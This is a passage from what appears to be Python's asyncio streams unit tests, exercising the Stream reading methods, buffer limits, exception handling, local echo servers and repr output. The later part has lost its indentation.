    f = reader.read()
    with self.assertRaises(ZeroDivisionError):
        self.loop.run_until_complete(f)
    writer.close()
    test_utils.run_briefly(self.loop)
    self.assertEqual(messages, [])

def test_open_connection_error(self):
    with test_utils.run_test_server() as httpd:
        conn_fut = asyncio.open_connection(*httpd.address,
                                           loop=self.loop)
        self._basetest_open_connection_error(conn_fut)

@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
    with test_utils.run_test_unix_server() as httpd:
        conn_fut = asyncio.open_unix_connection(httpd.address,
                                                loop=self.loop)
        self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
    # Feeding b'' is a no-op on the buffer.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)

    stream._feed_data(b'')
    self.assertEqual(b'', stream._buffer)

def test_feed_nonempty_data(self):
    # Fed bytes land in the internal buffer unchanged.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)

    stream._feed_data(self.DATA)
    self.assertEqual(self.DATA, stream._buffer)

def test_read_zero(self):
    # Read zero bytes.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(self.DATA)

    data = self.loop.run_until_complete(stream.read(0))
    self.assertEqual(b'', data)
    # read(0) must not consume the buffer.
    self.assertEqual(self.DATA, stream._buffer)

def test_read(self):
    # Read bytes.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    read_task = self.loop.create_task(stream.read(30))

    def cb():
        # Data arrives only after read() is already waiting.
        stream._feed_data(self.DATA)
    self.loop.call_soon(cb)

    data = self.loop.run_until_complete(read_task)
    self.assertEqual(self.DATA, data)
    self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
    # Read bytes without line breaks.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'line1')
    stream._feed_data(b'line2')

    data = self.loop.run_until_complete(stream.read(5))

    self.assertEqual(b'line1', data)
    self.assertEqual(b'line2', stream._buffer)

def test_read_eof(self):
    # Read bytes, stop at eof.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    read_task = self.loop.create_task(stream.read(1024))

    def cb():
        stream._feed_eof()
    self.loop.call_soon(cb)

    # EOF with no data yields b''.
    data = self.loop.run_until_complete(read_task)
    self.assertEqual(b'', data)
    self.assertEqual(b'', stream._buffer)

def test_read_until_eof(self):
    # Read all bytes until eof.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    # read(-1) means "read everything up to EOF".
    read_task = self.loop.create_task(stream.read(-1))

    def cb():
        stream._feed_data(b'chunk1\n')
        stream._feed_data(b'chunk2')
        stream._feed_eof()
    self.loop.call_soon(cb)

    data = self.loop.run_until_complete(read_task)

    self.assertEqual(b'chunk1\nchunk2', data)
    self.assertEqual(b'', stream._buffer)

def test_read_exception(self):
    # A set exception is raised by subsequent read() calls, after the
    # already-buffered data has been consumed normally.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'line\n')
    data = self.loop.run_until_complete(stream.read(2))
    self.assertEqual(b'li', data)

    stream._set_exception(ValueError())
    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
    # The limit must be a positive integer.
    with self.assertRaisesRegex(ValueError, 'imit'):
        asyncio.Stream(mode=asyncio.StreamMode.READ,
                       limit=0, loop=self.loop,
                       _asyncio_internal=True)

    with self.assertRaisesRegex(ValueError, 'imit'):
        asyncio.Stream(mode=asyncio.StreamMode.READ,
                       limit=-1, loop=self.loop,
                       _asyncio_internal=True)

def test_read_limit(self):
    # read() is not bounded by the limit (unlike readline()).
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            limit=3, loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'chunk')
    data = self.loop.run_until_complete(stream.read(5))
    self.assertEqual(b'chunk', data)
    self.assertEqual(b'', stream._buffer)

def test_readline(self):
    # Read one line. 'readline' will need to wait for the data
    # to come from 'cb'
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'chunk1 ')
    read_task = self.loop.create_task(stream.readline())

    def cb():
        stream._feed_data(b'chunk2 ')
        stream._feed_data(b'chunk3 ')
        stream._feed_data(b'\n chunk4')
    self.loop.call_soon(cb)

    line = self.loop.run_until_complete(read_task)
    self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
    # Bytes after the newline stay buffered for the next read.
    self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
    # Read one line. The data is in Stream's buffer
    # before the event loop is run.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            limit=3, loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'li')
    stream._feed_data(b'ne1\nline2\n')

    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readline())
    # The buffer should contain the remaining data after exception
    self.assertEqual(b'line2\n', stream._buffer)

    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            limit=3, loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'li')
    stream._feed_data(b'ne1')
    stream._feed_data(b'li')

    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readline())
    # No b'\n' at the end. The 'limit' is set to 3. So before
    # waiting for the new data in buffer, 'readline' will consume
    # the entire buffer, and since the length of the consumed data
    # is more than 3, it will raise a ValueError. The buffer is
    # expected to be empty now.
    self.assertEqual(b'', stream._buffer)

def test_at_eof(self):
    # at_eof() is True only once EOF was fed AND the buffer is drained.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    self.assertFalse(stream.at_eof())

    stream._feed_data(b'some data\n')
    self.assertFalse(stream.at_eof())

    self.loop.run_until_complete(stream.readline())
    self.assertFalse(stream.at_eof())

    stream._feed_data(b'some data\n')
    stream._feed_eof()
    self.loop.run_until_complete(stream.readline())
    self.assertTrue(stream.at_eof())
def test_readline_limit(self):
    # Read one line. Streams are fed with data after
    # their 'readline' methods are called.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            limit=7, loop=self.loop,
                            _asyncio_internal=True)

    def cb():
        stream._feed_data(b'chunk1')
        stream._feed_data(b'chunk2')
        stream._feed_data(b'chunk3\n')
        stream._feed_eof()
    self.loop.call_soon(cb)

    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readline())
    # The buffer had just one line of data, and after raising
    # a ValueError it should be empty.
    self.assertEqual(b'', stream._buffer)

    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            limit=7, loop=self.loop,
                            _asyncio_internal=True)

    def cb():
        stream._feed_data(b'chunk1')
        stream._feed_data(b'chunk2\n')
        stream._feed_data(b'chunk3\n')
        stream._feed_eof()
    self.loop.call_soon(cb)

    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readline())
    # Only the over-limit first line is discarded; the second line stays.
    self.assertEqual(b'chunk3\n', stream._buffer)

    # check strictness of the limit
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            limit=7, loop=self.loop,
                            _asyncio_internal=True)
    # Exactly 7 payload bytes + newline is still within the limit ...
    stream._feed_data(b'1234567\n')
    line = self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'1234567\n', line)
    self.assertEqual(b'', stream._buffer)

    # ... 8 bytes is over it, with or without a trailing newline.
    stream._feed_data(b'12345678\n')
    with self.assertRaises(ValueError) as cm:
        self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'', stream._buffer)

    stream._feed_data(b'12345678')
    with self.assertRaises(ValueError) as cm:
        self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
    # All needed data for the first 'readline' call will be
    # in the buffer.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(self.DATA[:6])
    stream._feed_data(self.DATA[6:])

    line = self.loop.run_until_complete(stream.readline())

    self.assertEqual(b'line1\n', line)
    self.assertEqual(b'line2\nline3\n', stream._buffer)

def test_readline_eof(self):
    # An unterminated final line is returned as-is at EOF.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'some data')
    stream._feed_eof()

    line = self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'some data', line)

def test_readline_empty_eof(self):
    # EOF with nothing buffered yields b''.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_eof()

    line = self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'', line)

def test_readline_read_byte_count(self):
    # readline() and read() share one buffer position.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(self.DATA)

    self.loop.run_until_complete(stream.readline())

    data = self.loop.run_until_complete(stream.read(7))

    self.assertEqual(b'line2\nl', data)
    self.assertEqual(b'ine3\n', stream._buffer)

def test_readline_exception(self):
    # After _set_exception, readline() raises and drops the buffer.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'line\n')

    data = self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'line\n', data)

    stream._set_exception(ValueError())
    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readline())
    self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
    # An empty separator is rejected.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    with self.assertRaisesRegex(ValueError, 'Separator should be'):
        self.loop.run_until_complete(stream.readuntil(separator=b''))

def test_readuntil_multi_chunks(self):
    # The returned data includes the separator; the remainder stays
    # buffered.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)

    stream._feed_data(b'lineAAA')
    data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
    self.assertEqual(b'lineAAA', data)
    self.assertEqual(b'', stream._buffer)

    stream._feed_data(b'lineAAA')
    data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
    self.assertEqual(b'lineAAA', data)
    self.assertEqual(b'', stream._buffer)

    stream._feed_data(b'lineAAAxxx')
    data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
    self.assertEqual(b'lineAAA', data)
    self.assertEqual(b'xxx', stream._buffer)

def test_readuntil_multi_chunks_1(self):
    # Separators split across multiple fed chunks must still be found.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)

    stream._feed_data(b'QWEaa')
    stream._feed_data(b'XYaa')
    stream._feed_data(b'a')
    data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
    self.assertEqual(b'QWEaaXYaaa', data)
    self.assertEqual(b'', stream._buffer)

    stream._feed_data(b'QWEaa')
    stream._feed_data(b'XYa')
    stream._feed_data(b'aa')
    data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
    self.assertEqual(b'QWEaaXYaaa', data)
    self.assertEqual(b'', stream._buffer)

    stream._feed_data(b'aaa')
    data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
    self.assertEqual(b'aaa', data)
    self.assertEqual(b'', stream._buffer)

    stream._feed_data(b'Xaaa')
    data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
    self.assertEqual(b'Xaaa', data)
    self.assertEqual(b'', stream._buffer)

    stream._feed_data(b'XXX')
    stream._feed_data(b'a')
    stream._feed_data(b'a')
    stream._feed_data(b'a')
    data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
    self.assertEqual(b'XXXaaa', data)
    self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
    # EOF before the separator arrives: IncompleteReadError carrying
    # the partial data, with no expected length.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'some dataAA')
    stream._feed_eof()

    with self.assertRaises(asyncio.IncompleteReadError) as cm:
        self.loop.run_until_complete(stream.readuntil(b'AAA'))
    self.assertEqual(cm.exception.partial, b'some dataAA')
    self.assertIsNone(cm.exception.expected)
    self.assertEqual(b'', stream._buffer)

def test_readuntil_limit_found_sep(self):
    # Over-limit buffer: different LimitOverrunError messages depending
    # on whether the separator has been found yet; data stays buffered.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop, limit=3,
                            _asyncio_internal=True)
    stream._feed_data(b'some dataAA')

    with self.assertRaisesRegex(asyncio.LimitOverrunError,
                                'not found') as cm:
        self.loop.run_until_complete(stream.readuntil(b'AAA'))

    self.assertEqual(b'some dataAA', stream._buffer)

    stream._feed_data(b'A')
    with self.assertRaisesRegex(asyncio.LimitOverrunError,
                                'is found') as cm:
        self.loop.run_until_complete(stream.readuntil(b'AAA'))

    self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
    # Read exact number of bytes (zero or less).
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(self.DATA)

    data = self.loop.run_until_complete(stream.readexactly(0))
    self.assertEqual(b'', data)
    self.assertEqual(self.DATA, stream._buffer)

    # Negative counts are rejected and leave the buffer untouched.
    with self.assertRaisesRegex(ValueError, 'less than zero'):
        self.loop.run_until_complete(stream.readexactly(-1))
    self.assertEqual(self.DATA, stream._buffer)

def test_readexactly(self):
    # Read exact number of bytes.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)

    n = 2 * len(self.DATA)
    read_task = self.loop.create_task(stream.readexactly(n))

    def cb():
        # Feed three chunks; only the first two are consumed.
        stream._feed_data(self.DATA)
        stream._feed_data(self.DATA)
        stream._feed_data(self.DATA)
    self.loop.call_soon(cb)

    data = self.loop.run_until_complete(read_task)
    self.assertEqual(self.DATA + self.DATA, data)
    self.assertEqual(self.DATA, stream._buffer)

def test_readexactly_limit(self):
    # readexactly() is not bounded by the limit.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            limit=3, loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'chunk')
    data = self.loop.run_until_complete(stream.readexactly(5))
    self.assertEqual(b'chunk', data)
    self.assertEqual(b'', stream._buffer)

def test_readexactly_eof(self):
    # Read exact number of bytes (eof).
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    n = 2 * len(self.DATA)
    read_task = self.loop.create_task(stream.readexactly(n))

    def cb():
        stream._feed_data(self.DATA)
        stream._feed_eof()
    self.loop.call_soon(cb)

    with self.assertRaises(asyncio.IncompleteReadError) as cm:
        self.loop.run_until_complete(read_task)
    self.assertEqual(cm.exception.partial, self.DATA)
    self.assertEqual(cm.exception.expected, n)
    self.assertEqual(str(cm.exception),
                     '18 bytes read on a total of 36 expected bytes')
    self.assertEqual(b'', stream._buffer)

def test_readexactly_exception(self):
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    stream._feed_data(b'line\n')

    data = self.loop.run_until_complete(stream.readexactly(2))
    self.assertEqual(b'li', data)

    stream._set_exception(ValueError())
    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
    # exception() reflects whatever was installed via _set_exception.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)
    self.assertIsNone(stream.exception())

    exc = ValueError()
    stream._set_exception(exc)
    self.assertIs(stream.exception(), exc)

def test_exception_waiter(self):
    # An exception set while a reader is waiting wakes the reader with
    # that exception.
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)

    async def set_err():
        stream._set_exception(ValueError())

    t1 = self.loop.create_task(stream.readline())
    t2 = self.loop.create_task(set_err())

    self.loop.run_until_complete(asyncio.wait([t1, t2]))

    self.assertRaises(ValueError, t1.result)

def test_exception_cancel(self):
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            loop=self.loop,
                            _asyncio_internal=True)

    t = self.loop.create_task(stream.readline())
    test_utils.run_briefly(self.loop)
    t.cancel()
    test_utils.run_briefly(self.loop)
    # The following line fails if set_exception() isn't careful.
    stream._set_exception(RuntimeError('message'))
    test_utils.run_briefly(self.loop)
    self.assertIs(stream._waiter, None)
def test_start_server(self):
    """End-to-end echo test of asyncio.start_server with both a
    coroutine client handler and a plain-callback handler."""

    class MyServer:

        def __init__(self, loop):
            self.server = None
            self.loop = loop

        async def handle_client(self, client_reader, client_writer):
            # Echo one line back, then close cleanly.
            data = await client_reader.readline()
            client_writer.write(data)
            await client_writer.drain()
            client_writer.close()
            await client_writer.wait_closed()

        def start(self):
            # Bind an OS-assigned port and hand the socket to start_server.
            sock = socket.create_server(('127.0.0.1', 0))
            self.server = self.loop.run_until_complete(
                asyncio.start_server(self.handle_client,
                                     sock=sock,
                                     loop=self.loop))
            return sock.getsockname()

        def handle_client_callback(self, client_reader, client_writer):
            # Non-coroutine handler: schedule the coroutine manually.
            self.loop.create_task(self.handle_client(client_reader,
                                                     client_writer))

        def start_callback(self):
            # Bind once to discover a free port, then close and let
            # start_server re-bind to host/port.
            sock = socket.create_server(('127.0.0.1', 0))
            addr = sock.getsockname()
            sock.close()
            self.server = self.loop.run_until_complete(
                asyncio.start_server(self.handle_client_callback,
                                     host=addr[0], port=addr[1],
                                     loop=self.loop))
            return addr

        def stop(self):
            if self.server is not None:
                self.server.close()
                self.loop.run_until_complete(self.server.wait_closed())
                self.server = None

    async def client(addr):
        with self.assertWarns(DeprecationWarning):
            reader, writer = await asyncio.open_connection(
                *addr, loop=self.loop)
        # send a line
        writer.write(b"hello world!\n")
        # read it back
        msgback = await reader.readline()
        writer.close()
        await writer.wait_closed()
        return msgback

    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))

    # test the server variant with a coroutine as client handler
    server = MyServer(self.loop)
    with self.assertWarns(DeprecationWarning):
        addr = server.start()
    msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
    server.stop()
    self.assertEqual(msg, b"hello world!\n")

    # test the server variant with a callback as client handler
    server = MyServer(self.loop)
    with self.assertWarns(DeprecationWarning):
        addr = server.start_callback()
    msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
    server.stop()
    self.assertEqual(msg, b"hello world!\n")

    self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start_callback()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# Stream's limit so that twice it is less than the size
# of the data writter. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=1,
_asyncio_internal=True)
protocol = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(
*args,
pass_fds={wfd},
)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(stream.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
stream = mock.Mock()
protocol = _StreamProtocol(stream, _asyncio_internal=True)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises_deprecated(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('127.0.0.1', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_connection(
host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('localhost', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
stream = await asyncio.connect(host, port)
while True:
stream.write(b"foo\n")
await stream.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=123,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_eof()
self.assertEqual("<Stream mode=StreamMode.READ eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'data')
self.assertEqual("<Stream mode=StreamMode.READ 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
exc = RuntimeError()
stream._set_exception(exc)
self.assertEqual("<Stream mode=StreamMode.READ exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._waiter = self.loop.create_future()
self.assertRegex(
repr(stream),
r"<Stream .+ waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__transport(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<Stream mode=StreamMode.READ transport=<Transport>>",
repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(stream.is_closing())
stream.close()
self.assertTrue(stream.is_closing())
self.loop.run_until_complete(stream.wait_closed())
def test_wait_closed_on_close_with_unread_data_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
stream.close()
self.loop.run_until_complete(stream.wait_closed())
def test_del_stream_before_sock_closing(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
async def test():
with test_utils.run_test_server() as httpd:
stream = await asyncio.connect(*httpd.address)
sock = stream.get_extra_info('socket')
self.assertNotEqual(sock.fileno(), -1)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
# drop refs to reader/writer
del stream
gc.collect()
# make a chance to close the socket
await asyncio.sleep(0)
self.assertEqual(1, len(messages), messages)
self.assertEqual(sock.fileno(), -1)
self.loop.run_until_complete(test())
self.assertEqual(1, len(messages), messages)
self.assertEqual('An open stream object is being garbage '
'collected; call "stream.close()" explicitly.',
messages[0]['message'])
def test_del_stream_before_connection_made(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
